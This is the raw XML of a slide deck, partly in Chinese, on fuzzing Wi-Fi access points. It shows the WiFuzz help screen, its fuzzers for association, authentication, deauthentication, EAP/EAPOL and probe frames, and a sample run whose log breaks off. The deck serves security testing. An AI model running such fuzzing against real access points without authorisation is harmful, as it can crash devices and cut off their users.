                    </a:lnB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1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endParaRPr lang="en-US" altLang="en-US" sz="11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0" vert="horz" anchor="b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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Information element value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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52755" y="1642110"/>
            <a:ext cx="72980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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzzer Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="pp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0520" y="2085975"/>
            <a:ext cx="5866765" cy="427799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098165" y="2337435"/>
            <a:ext cx="27990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RandNum SSID:1-255</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="ppt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2235" y="3549650"/>
            <a:ext cx="9511030" cy="218122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602095" y="2047875"/>
            <a:ext cx="515493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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beacon SSID fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assoc....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProbeResp.....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.......</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>802.11 Frame Infomation Element</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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34315" y="1390650"/>
            <a:ext cx="4855845" cy="95091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针对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifi AP Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：                            </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Association request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.Authentication request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.Beacon requestr                </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Deassociation request </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.Deauthentication request     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.EAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.EAPOL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8. Probe request  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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303905" y="1604010"/>
            <a:ext cx="8581390" cy="52622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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-=- WiFuzz: Access Point 802.11 STACK FUZZER -=-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax: python wifuzz.py -s &lt;ssid&gt; [options] &lt;fuzzer&gt;(,&lt;fuzzer&gt;)*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Available options:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-h       Show this help screen</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i       Network interface (default: wlan0)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o       Output directory for PCAP files (default: /dev/shm)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p       Ping timeout (default: 60 seconds)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-s       Set target AP SSID</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-t       Enable test mode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember to put your Wi-Fi card in monitor mode. Your driver must support</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traffic injection.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Available fuzzers:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|    Name    |        State         |             Description              |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|    any     |         none         | Random 802.11 frame fuzzer           |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|   assoc    |    authenticated     | Association request fuzzer           |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|    auth    |        probed        | Authentication request fuzzer        |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|   beacon   |         none         | Beacon request fuzzer                |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|  deassoc   |      associated      | Deassociation request fuzzer         |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|   deauth   |    authenticated     | Deauthentication request fuzzer      |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|    eap     |      associated      | EAP protocol fuzzer                  |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|   eapol    |      associated      | EAPOL (EAP-over-LAN) protocol fuzzer |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|   probe    |         none         | Probe request fuzzer                 |</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="120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框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629920" y="1478280"/>
            <a:ext cx="8949055" cy="57543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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$ sudo python wifuzz.py -s fuzztest auth</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:36 2016 {MAIN} Target SSID: fuzztest; Interface: wlan0; Ping timeout:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>60;PCAP directory: /dev/shm; Test mode? False; Fuzzer(s): auth;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:36 2016 {WIFI} Waiting for a beacon from SSID=[fuzztest] Thur Sep 26 21:41:36 2016 {WIFI} Beacon from SSID=[fuzztest] found (MAC=[11:22:33:44:55:66])</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:36 2016 {WIFI} Starting fuzz 'auth'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:36 2016 {WIFI} [R00001] Sending packets 1-100</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:50 2016 {WIFI} [R00001] Checking if the AP is still up...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:50 2016 {WIFI} Waiting for a beacon from SSID=[fuzztest] Thur Sep 26 21:41:50 2016 {WIFI} Beacon from SSID=[fuzztest] found (MAC=[11:22:33:44:55:66])</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:41:50 2016 {WIFI} [R00002] Sending packets 101-200 Thur Sep 26 21:42:04 2016 {WIFI} [R00002] Checking if the AP is still up...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
